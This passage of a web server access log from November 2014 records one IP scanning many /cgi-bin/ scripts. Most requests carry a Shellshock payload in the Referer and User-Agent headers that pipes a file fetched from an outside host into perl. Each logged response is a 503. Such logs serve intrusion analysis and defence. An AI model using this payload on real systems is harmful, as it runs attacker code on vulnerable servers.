:; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:05:14 +0200] "GET /cgi-bin/netauth.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:05:16 +0200] "GET /cgi-bin/myguestbook.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:05:17 +0200] "GET /cgi-bin/musicqueue.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:05:17 +0200] "GET /cgi-bin/mt/mt-load.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:05:19 +0200] "GET /cgi-bin/mt/mt-check.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:05:20 +0200] "GET /cgi-bin/mt-static/mt-load.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:05:20 +0200] "GET /cgi-bin/mt-static/mt-check.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:05:22 +0200] "GET /cgi-bin/mrtg.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:05:23 +0200] "GET /cgi-bin/mojo/mojo.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:05:23 +0200] "GET /cgi-bin/moin.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:05:25 +0200] "GET /cgi-bin/mmstdod.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:05:26 +0200] "GET /cgi-bin/mini_logger.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:05:26 +0200] "GET /cgi-bin/man.shHTTP/1.0" 503 323 "-" "-" +66.172.64.17 - - [01/Nov/2014:20:05:28 +0200] "GET /cgi-bin/main_menu.plHTTP/1.0" 503 323 "-" "-" +66.172.64.17 - - [01/Nov/2014:20:05:29 +0200] "GET /cgi-bin/main.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:05:29 +0200] "GET /cgi-bin/mailnews.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:05:31 +0200] "GET /cgi-bin/maillist.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:05:32 +0200] "GET /cgi-bin/mail/nph-mr.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:05:32 +0200] "GET /cgi-bin/mail/emumail.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:05:35 +0200] "GET /cgi-bin/MachineInfoHTTP/1.0" 503 323 "-" "-" +66.172.64.17 - - [01/Nov/2014:20:05:34 +0200] "GET /cgi-bin/magiccard.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:05:35 +0200] "GET /cgi-bin/lwgate.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:05:37 +0200] "GET /cgi-bin/lookwho.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:05:38 +0200] "GET /cgi-bin/logit.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:05:38 +0200] "GET /cgi-bin/login.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:05:40 +0200] "GET /cgi-bin/log-reader.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:05:41 +0200] "GET /cgi-bin/loadpage.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:05:41 +0200] "GET /cgi-bin/lastlines.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:05:44 +0200] "GET /cgi-bin/jammail.plHTTP/1.0" 503 323 "-" "-" +66.172.64.17 - - [01/Nov/2014:20:05:43 +0200] "GET /cgi-bin/journal.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:05:44 +0200] "GET /cgi-bin/infosrch.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:05:46 +0200] "GET /cgi-bin/ImageFolio/admin/admin.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:05:47 +0200] "GET /cgi-bin/imageFolio.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:05:47 +0200] "GET /cgi-bin/ikonboard/help.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:05:49 +0200] "GET /cgi-bin/if/admin/nph-build.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:05:50 +0200] "GET /cgi-bin/icatHTTP/1.0" 503 323 "-" "-" +66.172.64.17 - - [01/Nov/2014:20:05:50 +0200] "GET /cgi-bin/htsearch.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:05:52 +0200] "GET /cgi-bin/html2wml.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:05:53 +0200] "GET /cgi-bin/html2chtml.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:05:53 +0200] "GET /cgi-bin/hsx.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:05:56 +0200] "GET /cgi-bin/handler/netsonarHTTP/1.0" 503 323 "-" "-" +66.172.64.17 - - [01/Nov/2014:20:05:55 +0200] "GET /cgi-bin/hitview.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:05:56 +0200] "GET /cgi-bin/handler.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:05:58 +0200] "GET /cgi-bin/handlerHTTP/1.0" 503 323 "-" "-" +66.172.64.17 - - [01/Nov/2014:20:05:59 +0200] "GET /cgi-bin/guestbook.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:05:59 +0200] "GET /cgi-bin/gm.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:06:01 +0200] "GET /cgi-bin/gm-cplog.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:06:02 +0200] "GET /cgi-bin/gm-authors.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:06:02 +0200] "GET /cgi-bin/gH.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:06:05 +0200] "GET /cgi-bin/generate.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:06:04 +0200] "GET /cgi-bin/getdoc.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:06:05 +0200] "GET /cgi-bin/gbook/gbook.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:06:07 +0200] "GET /cgi-bin/gbadmin.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:06:08 +0200] "GET /cgi-bin/FormMail.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:06:08 +0200] "GET /cgi-bin/FormHandler.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:06:11 +0200] "GET /cgi-bin/fom.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:06:10 +0200] "GET /cgi-bin/fom/fom.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:06:11 +0200] "GET /cgi-bin/flexform.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:06:13 +0200] "GET /cgi-bin/finger.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:06:14 +0200] "GET /cgi-bin/FileSeek2.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:06:16 +0200] "GET /cgi-bin/faqmanager.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:06:14 +0200] "GET /cgi-bin/FileSeek.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:06:17 +0200] "GET /cgi-bin/ezshopper3/loadpage.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:06:17 +0200] "GET /cgi-bin/ezshopper2/loadpage.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:06:19 +0200] "GET /cgi-bin/ezshopper/search.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:06:20 +0200] "GET /cgi-bin/ezshopper/loadpage.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:06:20 +0200] "GET /cgi-bin/ezman.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:06:22 +0200] "GET /cgi-bin/ezboard.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:06:23 +0200] "GET /cgi-bin/ezadmin.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:06:24 +0200] "GET /cgi-bin/enter.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:06:26 +0200] "GET /cgi-bin/emumail/emumail.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:06:28 +0200] "GET /cgi-bin/emu/html/emumail.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:06:26 +0200] "GET /cgi-bin/emumail.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:06:29 +0200] "GET /cgi-bin/download.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:06:30 +0200] "GET /cgi-bin/directorypro.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:06:31 +0200] "GET /cgi-bin/dig.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:06:32 +0200] "GET /cgi-bin/diagnose.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:06:33 +0200] "GET /cgi-bin/dfire.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:06:34 +0200] "GET /cgi-bin/dcforum.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:06:35 +0200] "GET /cgi-bin/dbman/db.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:06:36 +0200] "GET /cgi-bin/db_manager.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:06:37 +0200] "GET /cgi-bin/day5datanotifier.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:06:38 +0200] "GET /cgi-bin/day5datacopier.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:06:39 +0200] "GET /cgi-bin/cvsqueryform.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:06:41 +0200] "GET /cgi-bin/cvslog.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:06:40 +0200] "GET /cgi-bin/cvsquery.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:06:42 +0200] "GET /cgi-bin/cvsblame.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:06:44 +0200] "GET /cgi-bin/csSearch.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:06:43 +0200] "GET /cgi-bin/csv_db.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:06:45 +0200] "GET /cgi-bin/csPassword/csPassword.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:06:46 +0200] "GET /cgi-bin/csPassword.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:06:47 +0200] "GET /cgi-bin/csNewsPro.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:06:48 +0200] "GET /cgi-bin/csNews.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:06:49 +0200] "GET /cgi-bin/CSMailto/CSMailto.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:06:50 +0200] "GET /cgi-bin/CSMailto.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:06:51 +0200] "GET /cgi-bin/csLiveSupport.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:06:52 +0200] "GET /cgi-bin/csGuestBook.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:06:53 +0200] "GET /cgi-bin/csChatRBox.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:06:54 +0200] "GET /cgi-bin/Count.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:06:55 +0200] "GET /cgi-bin/compatible.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:06:56 +0200] "GET /cgi-bin/common/listrec.plHTTP/1.0" 503 323 "-" "-" +66.172.64.17 - - [01/Nov/2014:20:06:57 +0200] "GET /cgi-bin/commerce.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:06:59 +0200] "GET /cgi-bin/classifieds/index.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:06:58 +0200] "GET /cgi-bin/commandit.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:07:00 +0200] "GET /cgi-bin/classifieds/classifieds.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:07:01 +0200] "GET /cgi-bin/classifieds.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:07:02 +0200] "GET /cgi-bin/classified.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:07:03 +0200] "GET /cgi-bin/cgi_processHTTP/1.0" 503 323 "-" "-" +66.172.64.17 - - [01/Nov/2014:20:07:05 +0200] "GET /cgi-bin/cgforum.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:07:04 +0200] "GET /cgi-bin/cgi.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:07:08 +0200] "GET /cgi-bin/cartmanager.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:07:07 +0200] "GET /cgi-bin/cbmc/forums.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:07:09 +0200] "GET /cgi-bin/calendar/index.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:07:11 +0200] "GET /cgi-bin/cached_feed.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:07:10 +0200] "GET /cgi-bin/cachemgr.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:07:12 +0200] "GET /cgi-bin/c_download.cgi HTTP/1.0" 503 516 "() { :; }; 